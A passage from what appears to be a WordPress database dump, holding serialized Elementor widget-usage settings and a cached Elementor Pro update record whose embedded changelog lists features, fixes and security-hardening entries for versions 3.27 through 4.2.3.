6:\"column\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:3:{s:12:\"_inline_size\";i:1;s:16:\"content_position\";i:1;s:5:\"align\";i:1;}}}}s:7:\"section\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:14:\"section_layout\";a:2:{s:6:\"layout\";i:1;s:16:\"content_position\";i:1;}}s:5:\"style\";a:1:{s:18:\"section_background\";a:3:{s:21:\"background_background\";i:1;s:16:\"background_color\";i:1;s:18:\"background_color_b\";i:1;}}}}}s:7:\"wp-page\";a:6:{s:5:\"image\";a:2:{s:5:\"count\";i:19;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_image\";a:4:{s:5:\"image\";i:19;s:10:\"image_size\";i:19;s:7:\"link_to\";i:1;s:4:\"link\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_style_image\";a:7:{s:5:\"width\";i:4;s:27:\"image_box_shadow_box_shadow\";i:8;s:5:\"align\";i:6;s:27:\"background_hover_transition\";i:6;s:15:\"hover_animation\";i:6;s:19:\"image_border_radius\";i:6;s:32:\"image_box_shadow_box_shadow_type\";i:6;}}}}s:6:\"column\";a:2:{s:5:\"count\";i:25;s:8:\"controls\";a:3:{s:6:\"layout\";a:1:{s:6:\"layout\";a:3:{s:12:\"_inline_size\";i:25;s:16:\"content_position\";i:1;s:5:\"align\";i:1;}}s:5:\"style\";a:2:{s:13:\"section_style\";a:3:{s:21:\"background_background\";i:6;s:16:\"background_color\";i:6;s:27:\"background_hover_transition\";i:2;}s:14:\"section_border\";a:2:{s:13:\"border_border\";i:6;s:13:\"border_radius\";i:6;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:6:\"margin\";i:6;}}}}s:7:\"section\";a:2:{s:5:\"count\";i:16;s:8:\"controls\";a:3:{s:6:\"layout\";a:2:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:7;}s:14:\"section_layout\";a:2:{s:6:\"layout\";i:1;s:16:\"content_position\";i:1;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:6:\"margin\";i:4;}}s:5:\"style\";a:1:{s:18:\"section_background\";a:3:{s:21:\"background_background\";i:1;s:16:\"background_color\";i:1;s:18:\"background_color_b\";i:1;}}}}s:7:\"heading\";a:2:{s:5:\"count\";i:18;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:18;s:11:\"header_size\";i:4;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:5:\"align\";i:15;}}}}s:11:\"text-editor\";a:2:{s:5:\"count\";i:21;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:21;}}}}s:6:\"button\";a:2:{s:5:\"count\";i:8;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:14:\"section_button\";a:5:{s:4:\"text\";i:8;s:13:\"selected_icon\";i:6;s:10:\"icon_align\";i:6;s:11:\"icon_indent\";i:6;s:4:\"link\";i:8;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:12:{s:5:\"align\";i:8;s:28:\"text_shadow_text_shadow_type\";i:6;s:23:\"text_shadow_text_shadow\";i:6;s:33:\"button_box_shadow_box_shadow_type\";i:6;s:28:\"button_box_shadow_box_shadow\";i:6;s:13:\"border_radius\";i:8;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:22:\"typography_font_weight\";i:2;s:15:\"hover_animation\";i:2;s:17:\"button_text_color\";i:1;s:11:\"hover_color\";i:2;}}s:8:\"advanced\";a:1:{s:15:\"section_effects\";a:2:{s:24:\"motion_fx_tilt_direction\";i:2;s:10:\"_animation\";i:2;}}}}}s:6:\"header\";a:5:{s:15:\"theme-site-logo\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:2:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:1;}}s:7:\"content\";a:1:{s:13:\"section_image\";a:1:{s:5:\"image\";i:1;}}}}s:6:\"column\";a:2:{s:5:\"count\";i:5;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:5;}}}}s:8:\"nav-menu\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_layout\";a:2:{s:10:\"full_width\";i:1;s:11:\"align_items\";i:1;}}s:5:\"style\";a:2:{s:22:\"section_style_dropdown\";a:3:{s:19:\"color_dropdown_item\";i:1;s:30:\"background_color_dropdown_item\";i:1;s:36:\"background_color_dropdown_item_hover\";i:1;}s:12:\"style_toggle\";a:1:{s:12:\"toggle_color\";i:1;}}}}s:6:\"button\";a:2:{s:5:\"count\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_button\";a:2:{s:4:\"text\";i:3;s:4:\"link\";i:3;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:5:{s:5:\"align\";i:3;s:15:\"hover_animation\";i:3;s:17:\"button_text_color\";i:3;s:16:\"background_color\";i:2;s:29:\"button_background_hover_color\";i:1;}}}}s:7:\"section\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:2:{s:6:\"layout\";a:2:{s:14:\"section_layout\";a:2:{s:6:\"layout\";i:1;s:16:\"content_position\";i:1;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:1;}}s:5:\"style\";a:2:{s:18:\"section_background\";a:3:{s:21:\"background_background\";i:1;s:16:\"background_color\";i:1;s:18:\"background_color_b\";i:1;}s:14:\"section_border\";a:2:{s:26:\"box_shadow_box_shadow_type\";i:1;s:21:\"box_shadow_box_shadow\";i:1;}}}}}}','off'),(91550,'elementor_pro_remote_info_api_data_3.32.3','a:2:{s:7:\"timeout\";i:1788491461;s:5:\"value\";s:258144:\"{\"stable_version\":\"4.2.3\",\"last_updated\":\"2026-08-31 15:08:32\",\"sections\":\"a:2:{s:11:\\\"description\\\";s:161:\\\"Elementor Pro adds new features to the Elementor Page Builder plugin. Control your conversions, your user engagement, your entire website, from one page builder.\\\";s:9:\\\"changelog\\\";s:243377:\\\"<h1>Elementor Pro - by Elementor.com<\\/h1>\\n<h4>4.2.3 - 2026-08-31<\\/h4>\\n<ul>\\n<li>Tweak: Updated WordPress compatibility to version 7.1<\\/li>\\n<\\/ul>\\n<h4>4.2.2 - 2026-08-19<\\/h4>\\n<ul>\\n<li>Fix: Improved code security enforcement in Dynamic Tags<\\/li>\\n<li>Fix: Improved code security enforcement in Form widget<\\/li>\\n<li>Fix: Dynamic tags are not supported in email recipient fields in Form - Atomic Editor<\\/li>\\n<\\/ul>\\n<h4>4.2.1 - 2026-07-28<\\/h4>\\n<ul>\\n<li>Fix: Child product categories display the parent category image when Loop Taxonomy is used in a Product Archive template - Atomic Editor<\\/li>\\n<li>Fix: ACF Dynamic Tags display default values instead of item data in Loops - Atomic Editor<\\/li>\\n<li>Fix: ACF fields display in a flat list instead of being grouped by field group in Dynamic Tag - Atomic Editor<\\/li>\\n<\\/ul>\\n<h4>4.2.0 - 2026-07-20<\\/h4>\\n<ul>\\n<li>New: Introducing Loop for building dynamic content layouts - Atomic Editor<\\/li>\\n<li>Tweak: Added Email 2 as an additional action after submit in Atomic Form - Atomic Editor<\\/li>\\n<li>Tweak: Improved the settings UI in Atomic Form - Atomic Editor<\\/li>\\n<li>Tweak: Added autocomplete support for better accessibility in Atomic Form - Atomic Editor<\\/li>\\n<li>Tweak: Added accessibility support for Atomic Form success and error messages after submission - Atomic Editor<\\/li>\\n<li>Fix: Local styles are not loaded inside Shortcode or Template widgets - Atomic Editor (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/32921\\\">#32921<\\/a>)<\\/li>\\n<li>Fix: Empty overrides in nested Components show the default value instead of remaining empty - Atomic Editor<\\/li>\\n<li>Fix: Classes created from Components override the expected class priority - Atomic Editor<\\/li>\\n<li>Fix: Redoing detach Component inside another Component leaves stale exposed properties behind - Atomic Editor<\\/li>\\n<li>Fix: Atomic Form elements cannot be copied and pasted - Atomic Editor<\\/li>\\n<li>Fix: Metadata is missing from email submissions in Atomic Form - Atomic Editor<\\/li>\\n<li>Fix: Sub-menu indicators flicker while the page is loading in WordPress Menu widget<\\/li>\\n<li>Fix: Load on Click duplicates the initial posts instead of loading the next posts when using multiple Posts widgets<\\/li>\\n<li>Fix: Buttons are not keyboard accessible in Flip Box widget<\\/li>\\n<li>Fix: Non-existent pages can trigger a fatal error in Archive and 404 templates<\\/li>\\n<li>Fix: Custom Search Results URLs can trigger a fatal error in Search widget<\\/li>\\n<li>Fix: Headings are highlighted inconsistently when scrolling down and back up in Table of Contents widget<\\/li>\\n<li>Fix: PHP warnings appear when WooCommerce coupons are disabled in Cart and Checkout widgets<\\/li>\\n<\\/ul>\\n<h4>4.1.3 - 2026-07-14<\\/h4>\\n<ul>\\n<li>Fix: Content section isn't expanded by default when adding atomic element inside Atomic Form - Atomic Editor<\\/li>\\n<li>Fix: Atomic Form cannot be saved as template - Atomic Editor<\\/li>\\n<\\/ul>\\n<h4>4.1.2 - 2026-06-23<\\/h4>\\n<ul>\\n<li>Fix: Email action is not configured correctly when submitting Atomic Forms - Atomic Editor<\\/li>\\n<\\/ul>\\n<h4>4.1.1 - 2026-06-08<\\/h4>\\n<ul>\\n<li>Fix: Live Results item count does not apply correctly on Tablet and Mobile in Search widget<\\/li>\\n<li>Fix: Default animation appears for logged-out users when using an ACF URL dynamic tag in Lottie widget<\\/li>\\n<li>Fix: "Something went wrong" error appears when using Taxonomy Filter with a Loop Grid based on Current Query<\\/li>\\n<\\/ul>\\n<h4>4.1.0 - 2026-05-26<\\/h4>\\n<ul>\\n<li>Tweak: Added Radio Button element to Atomic Form - Atomic Editor<\\/li>\\n<li>Tweak: Added Select element to Atomic Form - Atomic Editor<\\/li>\\n<li>Tweak: Added Date Picker element to Atomic Form - Atomic Editor<\\/li>\\n<li>Tweak: Added Time Picker element to Atomic Form - Atomic Editor<\\/li>\\n<li>Tweak: Added File Upload element to Atomic Form - Atomic Editor<\\/li>\\n<li>Tweak: Added Webhook URL support to Atomic Form - Atomic Editor<\\/li>\\n<li>Tweak: Improved the default To and From field settings in Atomic Form - Atomic Editor<\\/li>\\n<li>Tweak: Updated the Connected Input ID control to a Select control in Atomic Form - Atomic Editor<\\/li>\\n<li>Tweak: Added the Atomic Elements section when editing Loop Grid templates - Atomic Editor<\\/li>\\n<li>Tweak: Added support for dynamic field mentions in email content in Atomic Form - Atomic Editor<\\/li>\\n<li>Tweak: Added Start and End grid lines for the While Scrolling effect in Interactions - Atomic Editor<\\/li>\\n<li>Tweak: Updated the minimum required WordPress version to 6.8<\\/li>\\n<li>Fix: Custom styles are lost for Atomic elements used in loops - Atomic Editor<\\/li>\\n<li>Fix: Action Log and Page Title are not recorded in Atomic Form submissions - Atomic Editor<\\/li>\\n<li>Fix: Inline editing does not work for Buttons inside Atomic Form - Atomic Editor<\\/li>\\n<li>Fix: Atomic Form cannot be dragged into containers or child containers - Atomic Editor<\\/li>\\n<li>Fix: Pasting content from another site may cause a fatal error with Loop Item Templates<\\/li>\\n<\\/ul>\\n<h4>4.0.4 - 2026-04-28<\\/h4>\\n<ul>\\n<li>Fix: Flexbox and Div Block do not work with display conditions - Atomic Editor<\\/li>\\n<li>Fix: Custom CSS editor not editable in RTL websites - Atomic Editor<\\/li>\\n<\\/ul>\\n<h4>4.0.3 - 2026-04-20<\\/h4>\\n<ul>\\n<li>Tweak: Updated base style font styling in Atomic Form - Atomic Editor<\\/li>\\n<li>Fix: Submit button not working inside popups in Atomic Form - Atomic Editor<\\/li>\\n<li>Fix: Forms fail to send when using ACF Email dynamic tag - Atomic Editor<\\/li>\\n<li>Fix: Custom CSS editor not editable in RTL websites - Atomic Editor<\\/li>\\n<\\/ul>\\n<h4>4.0.2 - 2026-04-13<\\/h4>\\n<ul>\\n<li>Fix: Interactions apply only to the first matching element instead of all instances on the page - Atomic Editor<\\/li>\\n<\\/ul>\\n<h4>4.0.1 - 2026-04-01<\\/h4>\\n<ul>\\n<li>Fix: Exposed text properties appear empty in existing components - Atomic Editor (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/35357\\\">#35357<\\/a>)<\\/li>\\n<li>Fix: Cannot publish existing components with overridable properties - Atomic Editor<\\/li>\\n<li>Fix: Unexpected characters appear when deleting attribute values using backspace - Atomic Editor<\\/li>\\n<\\/ul>\\n<h4>4.0.0 - 2026-03-30<\\/h4>\\n<ul>\\n<li>New: Introducing Atomic Forms using composable Atomic elements - create flexible form layouts by combining individual field elements - Atomic Editor<\\/li>\\n<li>New: Introducing Interactions with new triggers and custom effects for dynamic experiences - create animations based on user scroll and user behavior - Atomic Editor<\\/li>\\n<li>Tweak: Component creation is available for Pro users - Atomic Editor<\\/li>\\n<li>Tweak: Added the ability to detach Components into editable layouts - Atomic Editor<\\/li>\\n<li>Tweak: Added support for custom fonts in typography controls - Atomic Editor<\\/li>\\n<li>Fix: Unable to paste content into the Custom CSS field - Atomic Editor<\\/li>\\n<li>Fix: Error when assigning a dynamic custom field to a component's inner element in Components - Atomic Editor<\\/li>\\n<\\/ul>\\n<h4>3.35.1 - 2026-02-11<\\/h4>\\n<ul>\\n<li>Fix: Enqueue script errors when <code>WP_DEBUG<\\/code> is enabled (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/34617\\\">#34617<\\/a>)<\\/li>\\n<li>Fix: General UI issues in Editor screens in WordPress Admin<\\/li>\\n<\\/ul>\\n<h4>3.35.0 - 2026-02-02<\\/h4>\\n<ul>\\n<li>Tweak: Extended the color picker to support ACF fields - Editor V4<\\/li>\\n<li>Tweak: Enabled size variables with custom units across relevant controls - Editor V4<\\/li>\\n<li>Tweak: Enabled size variables in border radius controls - Editor V4<\\/li>\\n<\\/ul>\\n<h4>3.34.4 - 2026-01-29<\\/h4>\\n<ul>\\n<li>Fix: Shortcodes overflow the screen on Saved Templates screen in WordPress Admin<\\/li>\\n<li>Fix: Avoid Multiple Popups control does not work in Popups<\\/li>\\n<\\/ul>\\n<h4>3.34.3 - 2026-01-26<\\/h4>\\n<ul>\\n<li>Fix: Theme Builder WordPress view does not work as expected<\\/li>\\n<li>Fix: Submissions menu appears even when the setting is disabled<\\/li>\\n<\\/ul>\\n<h4>3.34.2 - 2026-01-22<\\/h4>\\n<ul>\\n<li>Tweak: Updated notification behavior in Elementor menu in WordPress admin<\\/li>\\n<\\/ul>\\n<h4>3.34.1 - 2026-01-20<\\/h4>\\n<ul>\\n<li>Tweak: Unified the Elementor interface into a single place to manage, optimize, and configure Elementor capabilities in WordPress admin<\\/li>\\n<\\/ul>\\n<h4>3.34.0 - 2025-12-22<\\/h4>\\n<ul>\\n<li>New: Added support for Display Conditions for Atomic Elements - Editor V4<\\/li>\\n<li>Tweak: Enabled media queries for the Desktop breakpoint only in Custom CSS - Editor V4<\\/li>\\n<li>Tweak: Added support for ACF field in Dynamic Tags - Editor V4<\\/li>\\n<li>Tweak: Added support for Google Calendar in Contact URL Dynamic Tag - Editor V4<\\/li>\\n<li>Tweak: Added support for Tel link in Contact URL Dynamic Tag - Editor V4<\\/li>\\n<li>Tweak: Added support for ACF Image field in Dynamic Tags - Editor V4<\\/li>\\n<li>Tweak: Removed icon from the accessibility tree in Flip Box widget<\\/li>\\n<li>Tweak: Applied CSS logical properties in text-align controls and improved RTL rendering in the Editor<\\/li>\\n<li>Fix: Website Template library displayed in English instead of the translated language<\\/li>\\n<li>Fix: Custom CSS field breaks when using certain characters - Editor V4<\\/li>\\n<\\/ul>\\n<h4>3.33.2 - 2025-12-03<\\/h4>\\n<ul>\\n<li>Fix: Incorrect status shown for Custom Code, Fonts, and Icons after importing a Website Template<\\/li>\\n<li>Fix: Display Conditions window appears empty in the editor<\\/li>\\n<\\/ul>\\n<h4>3.33.1 - 2025-11-11<\\/h4>\\n<ul>\\n<li>Fix: Styles not loading correctly in Custom Fonts and Custom Icons admin screens (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/33396\\\">#33396<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.33.0 - 2025-11-10<\\/h4>\\n<ul>\\n<li>New: Introducing Custom CSS for element-level styling with full isolation and responsive control - Editor V4<\\/li>\\n<li>New: Introducing media save to cloud in Website Templates, enabling users to store media assets directly in the cloud for easier access and management.<\\/li>\\n<li>Tweak: Added support for Post Excerpt dynamic tag - Editor V4<\\/li>\\n<li>Tweak: Added support for Internal URL dynamic tag - Editor V4<\\/li>\\n<li>Tweak: Added support for Post Terms dynamic tag - Editor V4<\\/li>\\n<li>Tweak: Added support for Shortcode dynamic tag - Editor V4<\\/li>\\n<li>Tweak: Added support for Popup dynamic tag - Editor V4<\\/li>\\n<li>Tweak: Added support for Off-Canvas dynamic tag - Editor V4<\\/li>\\n<li>Tweak: Added support for Lightbox dynamic tag - Editor V4<\\/li>\\n<li>Tweak: Added support for Add To Cart dynamic tag - Editor V4<\\/li>\\n<li>Tweak: Added support for ACF URL dynamic tag - Editor V4<\\/li>\\n<li>Tweak: Added support for Archive Title dynamic tag - Editor V4<\\/li>\\n<li>Tweak: Added support for the Email Contact URL dynamic tag - Editor V4<\\/li>\\n<li>Tweak: Added support for reduced-motion preferences in Flip Box widget<\\/li>\\n<li>Tweak: Updated minimum supported versions for Chrome, Firefox, and Safari<\\/li>\\n<li>Tweak: Updated Notes button location in the Editor Top Bar<\\/li>\\n<\\/ul>\\n<h4>3.32.3 - 2025-10-21<\\/h4>\\n<ul>\\n<li>Fix: Website Template fails to apply when Custom Code or Custom Icons are included<\\/li>\\n<\\/ul>\\n<h4>3.32.2 - 2025-09-29<\\/h4>\\n<ul>\\n<li>Fix: Exported taxonomies are not displayed correctly on the summary page in Website Templates export<\\/li>\\n<li>Fix: Certain taxonomies are not exported as expected in Website Templates export<\\/li>\\n<\\/ul>\\n<h4>3.32.1 - 2025-09-16<\\/h4>\\n<ul>\\n<li>Fix: Theme Builder fails to load when containers are disabled<\\/li>\\n<li>Fix: Popup and single product templates not imported or exported as expected<\\/li>\\n<\\/ul>\\n<h4>3.32.0 - 2025-09-15<\\/h4>\\n<ul>\\n<li>New: Introducing Size Variables to store and reuse numeric values across spacing, typography, layout, and borders - Editor V4<\\/li>\\n<li>New: Introducing granular Transitions with property-level control for advanced micro-animations - Editor V4<\\/li>\\n<li>New: Added granular content selection for Website Templates import and export, including pages, menus, post types, and taxonomies<\\/li>\\n<li>Tweak: Enhanced accessibility of background images in Slides widget with proper aria attributes (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/23543\\\">#23543<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/31063\\\">#31063<\\/a>)<\\/li>\\n<li>Tweak: Added REST API support for the Custom Code feature<\\/li>\\n<li>Tweak: Moved Background control from Content tab to Style tab in Flip Box widget<\\/li>\\n<li>Tweak: Removed SVG icons from the accessibility tree in Share Buttons widget<\\/li>\\n<li>Tweak: Removed dropdown indicator icons from the accessibility tree in WordPress Menu widget<\\/li>\\n<li>Fix: PHP 8.4 deprecation notices when running with <code>WP_DEBUG<\\/code> enabled<\\/li>\\n<li>Fix: Reduced-motion preferences are not applied to Animated Headline widget<\\/li>\\n<li>Fix: Reduced-motion preferences are not applied in Motion Effects<\\/li>\\n<li>Fix: Added required PHP and WordPress versions to the plugin header<\\/li>\\n<\\/ul>\\n<h4>3.31.3 - 2025-09-08<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in WordPress Menu widget<\\/li>\\n<\\/ul>\\n<h4>3.31.2 - 2025-08-10<\\/h4>\\n<ul>\\n<li>Tweak: Improved release version functionality<\\/li>\\n<\\/ul>\\n<h4>3.31.1 - 2025-08-06<\\/h4>\\n<ul>\\n<li>Tweak: Updated <code>form-data<\\/code> package version<\\/li>\\n<\\/ul>\\n<h4>3.31.0 - 2025-08-05<\\/h4>\\n<ul>\\n<li>New: Introducing Attributes - add custom HTML attributes to elements for advanced control - Editor V4<\\/li>\\n<li>Tweak: Optimized Custom Code styles by removing redundant RTL file<\\/li>\\n<li>Tweak: Improved performance by loading ribbon styles only when used in Call to Action and Price Table widgets<\\/li>\\n<li>Tweak: Improved semantic markup structure for header and footer documents<\\/li>\\n<li>Tweak: Reorganized design controls in Animated Headline widget<\\/li>\\n<li>Tweak: Reorganized design controls in Blockquote widget<\\/li>\\n<li>Tweak: Reorganized design controls in Countdown widget<\\/li>\\n<li>Tweak: Replaced SASS mixins and functions with native CSS logical properties<\\/li>\\n<li>Fix: Empty headers are rendered in Table of Contents widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28167\\\">#28167<\\/a>)<\\/li>\\n<li>Fix: <code>TypeError<\\/code> bug in Menu widget<\\/li>\\n<\\/ul>\\n<h4>3.30.1 - 2025-07-22<\\/h4>\\n<ul>\\n<li>Security Fix: Improved content sanitization in multiple widgets<\\/li>\\n<li>Fix: UI issue in Hotspot widget when Optimized Markup experiment is enabled<\\/li>\\n<li>Fix: Taxonomy filter not working in the Editor when Optimized Markup experiment is enabled<\\/li>\\n<\\/ul>\\n<h4>3.30.0 - 2025-07-01<\\/h4>\\n<ul>\\n<li>New: Introduced Full Website Templates in the Cloud - export, manage, and reuse full site kits across all your websites from one place<\\/li>\\n<li>Tweak: Activated "Optimized Markup" feature on new sites<\\/li>\\n<li>Tweak: Activated "Menu" feature on new sites<\\/li>\\n<li>Tweak: Improved error handling for Theme Builder display conditions<\\/li>\\n<li>Tweak: Added styling controls to Post Excerpt widget<\\/li>\\n<li>Tweak: Improved accessibility with <code>role<\\/code> and <code>aria-label<\\/code> attributes Post Navigation widget<\\/li>\\n<li>Tweak: Added <code>aria-label<\\/code> in Form widget<\\/li>\\n<li>Tweak: Added <code>aria-label<\\/code> in Login widget<\\/li>\\n<li>Tweak: Arranged content as lists in Portfolio and Posts widgets<\\/li>\\n<li>Tweak: Added Box Shadow and Text Shadow controls in Countdown widget<\\/li>\\n<li>Tweak: Moved image resolution control to content tab in Price List widget<\\/li>\\n<li>Tweak: Renamed and reorganized style sections in Price List widget<\\/li>\\n<li>Tweak: Added conditional logic to controls in Price Table widget<\\/li>\\n<li>Tweak: Grouped layout controls under list section in Price List widget<\\/li>\\n<li>Tweak: Updated minimum required WordPress version to 6.6<\\/li>\\n<li>Fix: Inline font icons support doesn't work in Post Navigation widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/24367\\\">#24367<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18343\\\">#18343<\\/a>)<\\/li>\\n<li>Fix: Page Title condition doesn't work on child pages in Widget Display Conditions<\\/li>\\n<li>Fix: Editor users with "Access to edit content only" are able to delete elements<\\/li>\\n<li>Fix: Links are not crawlable in Video Playlist widget<\\/li>\\n<li>Fix: Uses hardcoded admin fonts in Video Playlist widget<\\/li>\\n<li>Fix: Editor freezes when the Form widget is used with a high PHP upload size limit<\\/li>\\n<li>Fix: Errors occur when Debug mode is enabled in Slides widget<\\/li>\\n<li>Fix: Plugin dependency not enforced in Elementor Pro<\\/li>\\n<li>Fix: Console shows deprecation warning in Global Widgets<\\/li>\\n<\\/ul>\\n<h4>3.29.2 - 2025-06-04<\\/h4>\\n<ul>\\n<li>Tweak: Added selectors to Menu widget for compatibility with Optimized Markup experiment<\\/li>\\n<\\/ul>\\n<h4>3.29.1 - 2025-05-28<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Animated Headline widget<\\/li>\\n<li>Security Fix: Improved code security enforcement in Price Table widget<\\/li>\\n<\\/ul>\\n<h4>3.29.0 - 2025-05-19<\\/h4>\\n<ul>\\n<li>New: Introduced Cloud Templates - save, manage, and reuse your templates across all your sites from a single cloud library<\\/li>\\n<li>Tweak: Improved accessibility with <code>role<\\/code> attributes in Share Buttons widget<\\/li>\\n<li>Tweak: Improved accessibility by grouping content with <code>role=region<\\/code> in the Video Playlist widget<\\/li>\\n<li>Fix: Focus color is not applied correctly for accessibility in WordPress Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/24239\\\">#24239<\\/a>)<\\/li>\\n<li>Fix: Common scripts loaded late when using the Theme Builder<\\/li>\\n<\\/ul>\\n<h4>3.28.4 - 2025-05-05<\\/h4>\\n<ul>\\n<li>Fix: Empty results appeared on the frontend when using the Taxonomy Filter with the 'Avoid Duplicates' option in Loop Grid widget<\\/li>\\n<li>Fix: Errors occur when Debug mode is enabled and the Optimized Markup experiment is active<\\/li>\\n<\\/ul>\\n<h4>3.28.3 - 2025-04-16<\\/h4>\\n<ul>\\n<li>Tweak: Improved sidebar navigation flow on the Elementor Home screen<\\/li>\\n<\\/ul>\\n<h4>3.28.2 - 2025-03-30<\\/h4>\\n<ul>\\n<li>Fix: Default Elementor animation shown for logged-out users when using an "External URL" source in Lottie widget<\\/li>\\n<\\/ul>\\n<h4>3.28.1 - 2025-03-23<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Animated Headline and Form widgets<\\/li>\\n<\\/ul>\\n<h4>3.28.0 - 2025-03-17<\\/h4>\\n<ul>\\n<li>Tweak: Ensured File Upload field styles are overridden by global styles in Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11651\\\">#11651<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17223\\\">#17223<\\/a>)<\\/li>\\n<li>Tweak: Updated Scroll Snap description to clarify incompatibility with animations and motion effects<\\/li>\\n<li>Tweak: Prevented special characters from being encoded in the email subject field in Form widget<\\/li>\\n<li>Tweak: Loaded module styles within the module instead of registering them in <code>plugin.php<\\/code><\\/li>\\n<li>Tweak: Updated minimum required WordPress version to 6.5<\\/li>\\n<li>Tweak: Improved keyboard accessibility for menus in Editor Top Bar<\\/li>\\n<li>Tweak: Made the edit button accessible in the Template widget<\\/li>\\n<li>Tweak: Optimized Form widget performance by caching field assets <code>using get_style_depends()<\\/code> and <code>get_script_depends()<\\/code> methods<\\/li>\\n<li>Tweak: Added Text Shadow control in Testimonial Carousel, Call to Action and Animated Headline widgets<\\/li>\\n<li>Fix: Button icon alignment breaks when Inline Font Icons feature is activated (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16077\\\">#16077<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16511\\\">#16511<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17692\\\">#17692<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17922\\\">#17922<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19253\\\">#19253<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19370\\\">#19370<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21236\\\">#21236<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21844\\\">#21844<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28080\\\">#28080<\\/a>)<\\/li>\\n<li>Fix: Dropdown caret color did not follow menu item color when Inline Font Icons feature is activated (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17500\\\">#17500<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18466\\\">#18466<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/21664\\\">#21664<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/24929\\\">#24929<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28064\\\">#28064<\\/a>)<\\/li>\\n<li>Fix: Page doesn't scroll up when a coupon error notice appears in Checkout widget<\\/li>\\n<\\/ul>\\n<h4>3.27.7 - 2025-03-13<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Lottie widget<\\/li>\\n<\\/ul>\\n<h4>3.27.6 - 2025-03-10<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Template Condition<\\/li>\\n<\\/ul>\\n<h4>3.27.5 - 2025-03-03<\\/h4>\\n<ul>\\n<li>Fix: The <code>wp_trigger_error<\\/code> function causes the site to crash instead of triggering a warning when used with ACF text<\\/li>\\n<\\/ul>\\n<h4>3.27.4 - 2025-02-16<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Screenshots module<\\/li>\\n<li>Security Fix: Improved code security enforcement in Query control<\\/li>\\n<li>Fix: ACF <code>true_false<\\/code> field causing a fatal error when used as a dynamic tag with third-party plugins (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/30170\\\">#30170<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.27.3 - 2025-02-06<\\/h4>\\n<ul>\\n<li>Security Fix: Improved code security enforcement in Stripe Button widget<\\/li>\\n<\\/ul>\\n<h4>3.27.2 - 2025-02-03<\\/h4>\\n<ul>\\n<li>Fix: Value type configuration issue causing errors when using ACF<\\/li>\\n<li>Fix: Hide content on responsive breakpoint option is not working on WordPress Menu widget when Optimized Markup experiment is activated<\\/li>\\n<\\/ul>\\n<h4>3.27.1 - 2025-01-27<\\/h4>\\n<ul>\\n<li>Tweak: Increased the number of items allowed in Dynamic Tags options in Display Conditions for 